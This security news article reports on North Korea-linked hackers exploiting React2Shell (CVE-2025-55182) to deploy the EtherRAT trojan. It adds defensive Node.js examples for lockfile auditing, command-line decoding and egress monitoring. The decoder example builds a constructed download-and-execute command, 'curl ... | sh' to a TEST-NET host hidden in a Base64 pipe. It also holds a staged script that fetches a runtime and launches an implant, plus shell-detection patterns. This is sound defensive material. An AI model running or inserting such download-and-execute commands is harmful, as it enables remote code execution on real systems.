North Korea-Linked Hackers Exploit React2Shell to Deploy New EtherRAT Malware
North Korea-linked threat actors are exploiting the critical React2Shell vulnerability (CVE-2025-55182) in React Server Components to deploy a newly identified remote access trojan dubbed EtherRAT. EtherRAT stands out for using Ethereum smart contracts for command-and-control, deploying five independent Linux persistence mechanisms, and even pulling its own Node.js runtime from the official distribution site to remain portable and stealthy across targets. The activity is closely tied to the long-running “Contagious Interview” campaign, which targets Web3 and blockchain developers through fake job offers on platforms like LinkedIn, Upwork, and Fiverr, and now adds React2Shell exploitation and JavaScript-centric tooling to its arsenal.
North Korea-linked threat actors have become the latest group to weaponize React2Shell (CVE-2025-55182) to compromise modern JavaScript applications and deploy a new remote access trojan known as EtherRAT. The flaw, rated CVSS 10.0, is an unauthenticated remote code execution bug in React Server Components that also reaches frameworks built on them such as Next.js, so a single crafted request gives an attacker a direct path to running arbitrary commands on a vulnerable server.
What is React2Shell?
React2Shell is the nickname for CVE-2025-55182, a critical RCE vulnerability in the React Server Components “Flight” protocol. It affects React 19 deployments that serve Server Components, which in practice means the react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack packages and the frameworks that bundle them, Next.js included. Because the bug is insecure deserialization of attacker-controlled Flight payloads in the default configuration, a standard production build created with create-next-app can be exploitable with no custom application code at all. Exploitation takes one unauthenticated HTTP request and yields code execution inside the server's Node.js process; in the attacks described here that foothold was used to run a Base64-encoded shell command, which is what makes the bug attractive for rapid initial access and malware deployment at scale.
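The first thing a practitioner wants after reading the paragraph above is a way to tell whether a given build is still on an affected release. The following Node.js script is an added example written for this page, not code from the article or from the React project. It audits a lockfile v2/v3 `package-lock.json` for every installed copy of the three react-server-dom packages, including copies nested under other dependencies. The affected 19.x lines and the first fixed patch release of each line (19.0.1, 19.1.2, 19.2.1) are assumptions taken from the upstream React advisory as understood at the time of writing; verify them against the advisory before relying on the output. Next.js vendors its own copy of the RSC code, so `next` entries are only reported for manual review against the Next.js advisory rather than classified. The sample lockfile is constructed.

```javascript
// Added example, not code from the article or from the React project.
// Audits a package-lock.json (lockfile v2/v3) for React Server Components
// packages on a CVE-2025-55182-affected release.

const RSC_PACKAGES = [
  "react-server-dom-webpack",
  "react-server-dom-parcel",
  "react-server-dom-turbopack",
];

// ASSUMPTION (from the upstream React advisory, verify before use):
// fixed releases are 19.0.1, 19.1.2 and 19.2.1; earlier patches of each
// 19.x line are affected.
const FIRST_FIXED_PATCH = { "19.0": 1, "19.1": 2, "19.2": 1 };

function parseSemver(version) {
  const m = /^(\d+)\.(\d+)\.(\d+)(-.*)?$/.exec(version);
  if (!m) return null;
  return { major: +m[1], minor: +m[2], patch: +m[3], prerelease: m[4] || "" };
}

// True when a stable react-server-dom-* version is below the first fixed
// patch of its 19.x line. Other majors and unlisted lines return false.
function isAffected(version) {
  const v = parseSemver(version);
  if (!v || v.major !== 19) return false;
  const fixed = FIRST_FIXED_PATCH[`${v.major}.${v.minor}`];
  if (fixed === undefined) return false;
  return v.patch < fixed;
}

function classify(name, version) {
  if (name === "next") return "review-next-advisory"; // vendored RSC copy
  const v = parseSemver(version);
  if (!v) return "unparseable";
  if (v.prerelease) return "review-prerelease"; // canary builds need manual mapping
  return isAffected(version) ? "affected" : "fixed-or-unaffected";
}

// Walk every installed copy, including nested node_modules: a fixed
// top-level copy does not help if a dependency bundles an old one.
function auditLockfile(lockfileText) {
  const lock = JSON.parse(lockfileText);
  const findings = [];
  for (const [path, info] of Object.entries(lock.packages || {})) {
    const idx = path.lastIndexOf("node_modules/");
    if (idx === -1) continue; // "" is the root project entry
    const name = path.slice(idx + "node_modules/".length);
    if (name !== "next" && !RSC_PACKAGES.includes(name)) continue;
    findings.push({ path, name, version: info.version, status: classify(name, info.version) });
  }
  return findings;
}

// Constructed sample lockfile (not a real project).
const SAMPLE_LOCKFILE = JSON.stringify({
  name: "demo-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "demo-app" },
    "node_modules/next": { version: "15.5.6" },
    "node_modules/react": { version: "19.2.0" },
    "node_modules/react-server-dom-webpack": { version: "19.2.0" },
    "node_modules/some-lib/node_modules/react-server-dom-webpack": { version: "19.2.1" },
    "node_modules/react-server-dom-parcel": { version: "19.2.0-canary-0000000-20251001" },
  },
});

for (const f of auditLockfile(SAMPLE_LOCKFILE)) {
  console.log(`${f.status.padEnd(22)} ${f.name}@${f.version}  (${f.path})`);
}
```

To run it against a real project, replace `SAMPLE_LOCKFILE` with the contents of the project's `package-lock.json`; the nested `some-lib` entry in the sample is there to show why a top-level `npm ls` is not enough on its own.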
Inside EtherRAT’s toolkit
EtherRAT is a previously undocumented remote access trojan that resolves its command-and-control endpoints through Ethereum smart contracts rather than hard-coded domains, so the operators can rotate infrastructure by updating contract state and there is no domain or server for defenders to seize. Once deployed, it sets up five distinct Linux persistence mechanisms, downloads its own Node.js runtime from nodejs.org, and runs a JavaScript-based implant that can update itself and load additional payloads. Shipping its own runtime means the implant does not depend on whichever Node.js version the victim has installed, and the download itself looks like ordinary developer traffic; together with contract-based C2, that blends EtherRAT into legitimate web and blockchain workflows and complicates detection for defenders.
Links to Contagious Interview and EtherHiding
Researchers have observed strong overlaps between EtherRAT activity and the “Contagious Interview” campaign, a long-running DPRK operation that targets blockchain and Web3 developers through fake recruiter profiles and job interviews on platforms such as LinkedIn, Upwork, and Fiverr. Previous waves of this campaign abused the npm ecosystem with hundreds of malicious packages and used techniques like EtherHiding, where attacker infrastructure and configuration details are stored in Ethereum smart contracts to evade takedowns. The move to exploit React2Shell shows the same actors adapting quickly to front-end and cloud-native stacks, aligning their tradecraft with JavaScript-heavy development environments.
How the attack chain works
In the observed attacks, the chain starts with exploitation of CVE-2025-55182 via a crafted HTTP request that triggers a Base64-encoded shell command in the target React Server Components environment. That command downloads and runs a shell script; the script in turn retrieves the main JavaScript-based EtherRAT implant, deploys persistence, and configures the Ethereum smart contract-based C2 endpoints used for tasking and updates. Because every later stage is fetched at run time, the initial request carries almost none of the final tooling, so web-request signatures alone see little of the intrusion; process, file and egress telemetry on the host is where the later stages show up. Some reported incidents also involve follow-on objectives such as harvesting cloud credentials, pivoting into CI/CD infrastructure, and building botnets for broader campaigns.
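The one artifact the attack chain above does leave on the host is the Base64-encoded stage-one command, which shows up in process-execution telemetry as something like `sh -c "echo <blob> | base64 -d | sh"`. The Node.js snippet below is an added example written for this page, not code from the article or from any vendor. It pulls Base64-looking tokens out of a captured command line, decodes the ones that are printable text, and flags decoded text that looks like a download-and-execute stage or a Node.js runtime fetch. The command lines, the stage script and the 203.0.113.10 address (TEST-NET) are constructed for illustration, not observed indicators, and the encoded blob is generated from plaintext inside the block so both sides are visible. It assumes Node.js for the global `Buffer`.

```javascript
// Added example, not code from the article or from any vendor.
// Decodes Base64 tokens from a captured process command line and flags
// decoded shell text that looks like a download-and-execute stage.

const INDICATORS = [
  // curl/wget output piped straight into a shell
  ["download-and-execute", /\b(curl|wget)\b[^|;&\n]*\|\s*(sh|bash|dash|zsh)\b/],
  // a second decode layer inside the decoded stage
  ["nested-base64", /\bbase64\s+(-d|--decode)\b/],
  // fetching a Node.js runtime, as the article describes for EtherRAT
  ["node-runtime-fetch", /nodejs\.org\/dist\//],
  ["writes-to-temp", /\/(tmp|var\/tmp|dev\/shm)\//],
  ["marks-executable", /\bchmod\s+(\+x|[0-7]{3,4})\b/],
];

function findIndicators(text) {
  return INDICATORS.filter(([, re]) => re.test(text)).map(([name]) => name);
}

// Only keep decodings that are printable text; keys, hashes and JWT
// segments also look like Base64 but are not shell stages.
function decodePrintable(token) {
  const decoded = Buffer.from(token, "base64").toString("utf8");
  return /^[\x09\x0a\x0d\x20-\x7e]+$/.test(decoded) ? decoded : null;
}

function analyzeCommandLine(cmdline) {
  const usesBase64Decode = /\bbase64\s+(-d|--decode)\b/.test(cmdline);
  const findings = [];
  for (const token of cmdline.match(/[A-Za-z0-9+/]{20,}={0,2}/g) || []) {
    const decoded = decodePrintable(token);
    if (decoded === null) continue;
    findings.push({ encoded: token, decoded, indicators: findIndicators(decoded) });
  }
  // A decode step on the command line plus a decoded stage with at least one
  // indicator is the combination worth paging on.
  const suspicious = usesBase64Decode && findings.some((f) => f.indicators.length > 0);
  return { usesBase64Decode, findings, suspicious };
}

// Constructed samples (not observed indicators). The encoded blob is built
// from plaintext here so the reader can see both sides.
const STAGE_ONE = "curl -fsSL http://203.0.113.10/s.sh | sh";
const ENCODED = Buffer.from(STAGE_ONE).toString("base64");
const SAMPLE_EXEC_LOG = `sh -c "echo ${ENCODED} | base64 -d | sh"`;
const BENIGN_EXEC_LOG = "node /app/server.js --token eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0";
// Constructed illustration of a later stage that fetches its own runtime.
const SAMPLE_STAGE_SCRIPT = [
  "#!/bin/sh",
  "curl -fsSL -o /tmp/.n/node.tar.xz https://nodejs.org/dist/v20.11.1/node-v20.11.1-linux-x64.tar.xz",
  "tar -xJf /tmp/.n/node.tar.xz -C /tmp/.n",
  "/tmp/.n/node-v20.11.1-linux-x64/bin/node /tmp/.n/implant.js &",
].join("\n");

for (const line of [SAMPLE_EXEC_LOG, BENIGN_EXEC_LOG]) {
  const result = analyzeCommandLine(line);
  console.log(result.suspicious ? "SUSPICIOUS" : "ok        ", line.slice(0, 60));
  for (const f of result.findings) console.log("  decoded:", f.decoded, "->", f.indicators);
}
console.log("stage script indicators:", findIndicators(SAMPLE_STAGE_SCRIPT));
```

Feed it the command-line field from auditd EXECVE records or an EDR process-creation event; the benign JWT sample is included to show why a decoded blob with no indicators should stay at low priority rather than alert.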
Defensive steps for React and Web3 teams
For organizations building on React and Next.js, patching CVE-2025-55182 should be treated as an emergency: update the react-server-dom-webpack, react-server-dom-parcel and react-server-dom-turbopack packages to the fixed releases (19.0.1, 19.1.2 or 19.2.1 depending on the line, per the upstream React advisory), upgrade Next.js to a release that ships the fix, and re-check lockfiles for nested copies pulled in by dependencies. WAF rules and temporary IP filtering are reasonable short-term compensating controls where patching is delayed, but they only cover request shapes that are already known and must not be mistaken for a fix. Security teams supporting blockchain and Web3 developers should tighten npm package vetting, treat cloned “interview” repositories as untrusted (VS Code workspace trust left on, no auto-run tasks), and implement strict egress controls that flag Ethereum JSON-RPC traffic and Node.js runtime downloads from hosts that have no business doing either. Finally, developer-facing security awareness must address fake recruiter lures and malicious “coding tasks,” which remain a central social-engineering vector in Contagious Interview and its EtherRAT-driven variants.
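The egress control recommended above is easier to get right if it keys on the protocol rather than on a list of provider hostnames, because an EtherRAT operator can point the implant at any public or self-hosted Ethereum RPC endpoint. The Node.js snippet below is an added example written for this page, not code from the article or from any product. It evaluates egress proxy records against a per-host-role policy, flags Ethereum JSON-RPC requests from roles that should never talk to a chain, and separately flags Node.js runtime downloads from nodejs.org by hosts that are not build agents. The records, the `.invalid` hostnames, the role map and the contract address are constructed for illustration; `0x8da5cb5b` is simply used as a sample four-byte selector.

```javascript
// Added example, not code from the article or from any product.
// Flags Ethereum JSON-RPC egress and Node.js runtime downloads from hosts
// whose role does not warrant them.

// ASSUMED policy: which host roles are expected to speak Ethereum JSON-RPC
// or to fetch a Node.js runtime at all.
const ROLE_ALLOWS_ETH_RPC = { web: false, ci: false, chain: true };
const ROLE_ALLOWS_NODE_DOWNLOAD = { web: false, ci: true, chain: false };

// Returns {method, contract, selector} for an Ethereum JSON-RPC body,
// or null for anything else. Batched (array) bodies are not handled here.
function parseEthJsonRpc(body) {
  let msg;
  try { msg = JSON.parse(body); } catch { return null; }
  if (!msg || msg.jsonrpc !== "2.0" || typeof msg.method !== "string") return null;
  if (!msg.method.startsWith("eth_")) return null;
  const first = Array.isArray(msg.params) ? msg.params[0] : undefined;
  const target = first && typeof first === "object" ? first : {};
  return {
    method: msg.method,
    contract: typeof target.to === "string" ? target.to.toLowerCase() : null,
    selector: typeof target.data === "string" ? target.data.slice(0, 10) : null, // 0x + 4 bytes
  };
}

function evaluateEgress(records, rpcPolicy = ROLE_ALLOWS_ETH_RPC, dlPolicy = ROLE_ALLOWS_NODE_DOWNLOAD) {
  const alerts = [];
  for (const r of records) {
    const rpc = r.method === "POST" ? parseEthJsonRpc(r.body || "") : null;
    if (rpc && rpcPolicy[r.role] !== true) {
      alerts.push({
        src: r.src,
        reason: "eth-jsonrpc-from-non-chain-host",
        detail: `${rpc.method} to=${rpc.contract} selector=${rpc.selector} via ${r.host}`,
      });
    }
    if (r.host === "nodejs.org" && r.path.startsWith("/dist/") && dlPolicy[r.role] !== true) {
      alerts.push({
        src: r.src,
        reason: "node-runtime-download-from-runtime-host",
        detail: `${r.method} ${r.host}${r.path}`,
      });
    }
  }
  return alerts;
}

// Constructed egress proxy records (not real traffic).
const ETH_CALL_BODY = JSON.stringify({
  jsonrpc: "2.0", id: 1, method: "eth_call",
  params: [{ to: "0x00000000000000000000000000000000DEADBEEF", data: "0x8da5cb5b" }, "latest"],
});
const NODE_TARBALL = "/dist/v20.11.1/node-v20.11.1-linux-x64.tar.xz";
const SAMPLE_RECORDS = [
  { src: "web-01", role: "web", method: "POST", host: "rpc.example-provider.invalid", path: "/", body: ETH_CALL_BODY },
  { src: "indexer-01", role: "chain", method: "POST", host: "rpc.example-provider.invalid", path: "/", body: ETH_CALL_BODY },
  // Not JSON-RPC: no "jsonrpc" member, even though a field says eth_call.
  { src: "web-02", role: "web", method: "POST", host: "api.payments.invalid", path: "/v1/orders", body: '{"id":42,"method":"eth_call"}' },
  { src: "web-01", role: "web", method: "GET", host: "nodejs.org", path: NODE_TARBALL, body: "" },
  { src: "ci-01", role: "ci", method: "GET", host: "nodejs.org", path: NODE_TARBALL, body: "" },
];

for (const a of evaluateEgress(SAMPLE_RECORDS)) {
  console.log(`${a.src}: ${a.reason} (${a.detail})`);
}
```

The contract address and selector in the alert detail are what an analyst needs to look up the contract's stored configuration, which is where EtherHiding-style C2 keeps its current endpoints; that is the pivot from a network alert to the actual tasking infrastructure.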